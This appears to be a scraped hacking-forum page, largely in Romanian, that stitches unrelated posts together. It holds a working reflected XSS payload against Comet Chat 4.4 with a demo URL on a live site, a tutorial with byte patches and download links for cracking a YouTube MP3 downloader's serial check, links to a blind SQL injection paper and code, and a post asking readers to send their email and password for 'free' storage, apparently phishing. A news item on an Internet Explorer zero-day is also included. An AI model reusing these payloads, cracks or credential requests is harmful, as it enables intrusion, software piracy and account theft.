Leaderboard

############################# ##Discovered by: 001 ############################# ## 05.12.2012 ############################# ##Application: Comet Chat 4.4 ############################# ##hackyard.net and trojanforge.com ############################# cometchat/plugins/games/index.php?action=request&[COLOR="#FF0000"]toId[/COLOR]=1&gameId=');"><script>alert('Hackyard.net')</script>Sudoku<!--&gameWidth=1337 It may also work in comet chat 4.6 or other version, but i didn't tested. You need to make one new account in targeted website. Then you can use this xss like this: (toId = target id) Demo: http://www.opensc.ws/chat/plugins/games/index.php?action=request&[COLOR="#FF0000"]toId[/COLOR]=1&gameId=');"><script>alert('Hackyard.net')</script>Sudoku<!--&gameWidth=1337

Autor: Nytro © Romanian Security Team 2012 De obicei ascult muzica pe Youtube dar azi mi s-a pus pata sa imi descarc melodiile pe care le aveam in playlist. Si incerc eu niste site-uri, vad ca merg naspa, apoi caut si descarc un program pe care il gasesc aici: YouTube MP3 Downloader - Descarca - RO - Download.CHIP.eu . Pare ok, aranjat, cand colo, ma trezesc ca imi descarca/converteste doar jumatate de melodie. Cum tot nu aveam ce face, am zis sa incerc sa ii fac un crack. Primul pas si cel care mi-a luat cel mai mult timp a fost sa gasesc unde se face verificarea serialului. Se putea face simplu cautand mesajul de eroare: 007D8B51 . C785 3CFFFFFF >MOV DWORD PTR SS:[EBP-C4],Download.00638>; UNICODE "Invaild Regstration Code." Am gasit pana la urma unde se face verificarea serialului dupa ceva chin: Pur si simplu in locul unui jnz care nu se executa pun un jmp. Nu era practic verificarea serialului, ci doar o verificare anterioara. .text:007D8AF7 test eax, eax Insa apoi se face verificarea si la fel, se face un salt catre portiunea de cod care ne arata ca serialul este incorect. O simpla transformare din jnz in jz e de ajuns. Procedura .text:007D9323 loc_7D9323: Fiind apelata de .text:007D8FAB jnz loc_7D9323 Am avut ceva probleme cu mai multe exceptii insa am trecut peste. Nu va recomand IDA deoarece nu poate "patch-ui" direct executabilul. In primul rand trebuie modificat ceva in config pentru a avea disponibil meniul de "Patch", apoi se creaza un "diff" cu ajutorul caruia se patch-uieste programul. Mai multe detalii aici: Marco Ramilli's Blog: How to Patch Binary with IDA Pro Patch-ul este banal: This difference file is created by The Interactive Disassembler Downloader.exe 003D8AF9: 0F E9 003D8AFA: 84 66 003D8AFB: 65 01 003D8AFC: 01 00 003D8FAC: 85 84 Iar in teste, programul crack-uit pare sa accepte orice serial: Am reinstalat programul, facea aceleasi figuri, am pus crack-ul in locul lui si pare sa functioneze, sa accepte orice serial: Bine, nu stia daca il putem denumi "crack" dar cam asta e. Si in sfarsit imi descarca si mie toata melodia: "CIA - Suntem tot aici.mp3" Download crack: https://rstforums.com/proiecte/Crack.exe Mirrors: http://www.speedyshare.com/2M4sa/Crack.exe http://www18.zippyshare.com/v/38589448/file.html PS: Puteti compara cu originalul, folositi "Compare It" sau orice altceva pentru a verifica diferentele, sunt doar vreo 5 bytes diferiti. Setup: http://download.chip.eu/ro/YouTube-MP3-Downloader_6745448.html Thanks, // Nytro

While analysing a compromised web page, security experts from FireEye discovered malware that exploits a previously unknown security hole in Internet Explorer. The hole allows attackers to inject malicious code into the Internet Explorer user's system when a specially crafted web page is visited. All versions up to and including IE version 8 are vulnerable; currently available information suggests that later versions are not affected. The researchers from FireEye report that the attackers first used a Flash applet to deploy shell code in RAM by means of heap spraying, and that they then managed to execute the code via the zero-day hole in IE. The hole involves a use-after-free issue with CDwnBindInfo within IE. The security hole the researchers found was exploited to inject a DLL into the system but they have yet to comment on the library's purpose. The report states that the incident involves a "watering hole" attack: During such targeted cyber attacks, the attackers compromise web pages that are visited by their intended victims and deploy malicious code this way. The experts found the exploit on the web page of the Council on Foreign Relations (Council on Foreign Relations), a US think tank that includes around 4,500 influential political and business personalities. The attackers used a few lines of JavaScript code to ensure that the exploit is only executed if the visitor's system language is set to US English, Chinese, Japanese, Korean or Russian. Talking to security blogger Brian Krebs, Microsoft confirmed the vulnerability and said that only versions 6 to 8 of Internet Explorer are affected. Since that confirmation, a metaploit module has been published and US CERT has released a vulnerability note on the issue. With details of the problem in circulation, it will be very likely that attackers will have added or be adding the exploit into their arsenal of malware; users should look at moving to IE9 or later where they can. Update: Microsoft has also published its own official advisory and instructions on how to mitigate attacks and detect failing attacks on IE9 and IE10. Soursa Critical zero-day hole in Internet Explorer - Update - The H Security: News and Features

Index Why blind sql injection? How blind sql injection can be used? Testing vulnerability (MySQL - MSSQL): Time attack (MySQL) Time attack (MSSQL) Regexp attack's methodology Finding table name with Regexp attack (MySQL) Finding table name with Regexp attack (MSSQL) Exporting a value with Regexp attack (MySQL) Exporting a value with Regexp attack (MSSQL) Time considerations Bypassing filters Real life example Conclusions http://www.ihteam.net/papers/blind-sqli-regexp-attack.pdf You can download an example of PHP code from http://www.ihteam.net/papers/regexp_bsqli.php.tar.gz

Target : Webmin Postati doar ss cenzurat. Solvers : 1.B7ackAnge7z [pm] 2.Toshib4[pm] 3.nAb.h4x [pm] 4.ThePi [pm] 5.abraxyss [pm] // la ch asta la toti le-a fost lene sa posteze si mi-au dat pm

Ca tot sunt acum sarbatorile si ca tot se termina anul asta 2012 vreau sa va ofer 50 Gb gratis pe box.net!Da,gratis. Nu e nimic ilegal am o oferta de la box.net si atat! Nelimitat (sper)! PM cu mail si parola(nu trebuie sa fie cea de la mail cea pt contul dorit pe box.net) si pt restul detaliilor! PS. Box.net = Dropbox skydrive google drive

link : Download RDP32.zip from Sendspace.com - send big files the easy way